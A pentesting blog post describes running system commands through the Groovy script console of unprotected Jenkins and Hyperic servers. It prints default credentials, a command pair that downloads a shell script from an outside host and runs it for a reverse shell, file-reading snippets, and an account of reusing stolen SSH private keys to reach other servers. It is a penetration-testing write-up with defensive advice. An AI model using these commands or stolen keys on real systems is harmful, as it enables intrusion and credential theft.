AverageSecurityGuy

Security, Programming, Pentesting

About

Mastodon

Linked In

Projects

Cheat Sheets

Book

31 July 2012

One Groovy Pentest

by {"login"=>"averagesecurityguy", "email"=>"stephen@averagesecurityguy.info", "display_name"=>"averagesecurityguy", "first_name"=>"", "last_name"=>""}

Update:

The original post said that I had gained unauthenticated access to a Hudson server. In fact, I had gained access to a VMware Hyperic server using the default credentials of hqadmin/hqadmin. Hudson is probably vulnerable as well but I do not know. If you can confirm the problem exists in Hudson as well, let me know in the comments.

On penetration tests it is my habit to find web servers and see what I can access using either default credentials or in some cases no credentials. On my last two penetration tests I gained unauthenticated access to project management servers, one was Hudson and the other Jenkins. Both of these project management systems include a web-based console that allows you to execute Groovy code. After a little research, I found that Groovy allows you to run system commands using the syntax ["command", "arg1", "arg2"].execute(). The output of the command can be accessed using println.

With both servers I attempted to get a reverse shell by using the following commands:

["wget", "http://192.168.1.1/shell.py", "-O", "/tmp/shell.py"].execute()
["python", "/tmp/shell.py"].execute()

This did not work on either server. I then used pentestmonkey's list of reverse shell one liners to attempt to get a reverse shell working with ruby, bash, and perl. Again, nothing worked. Since I couldn't get a shell going, I decided to look around the server to see what data was available. I used the following commands:

# To list files
proc = ["ls", "-al", "/path/to/list"].execute()
println proc.in.text

# To cat a file
proc = ["cat", "/file/to/cat"].execute()
println proc.in.text

On the Jenkins server, I was able to access the .ssh folder of the jenkins user. This server contained private RSA keys, which I was able to feed into the Metasploit auxiliary module auxiliary/ssh/ssh_login_pubkey and gain access to three other servers.

If you are using a project management server such as Hudson or Jenkins ensure all unauthenticated access to the server is disabled. If you are a Penetration Tester, always check the web server running on the client's networks; you never know what you will find. You can use my low hanging fruit script to find active web servers.

tags: groovy - penetration testing - Pentesting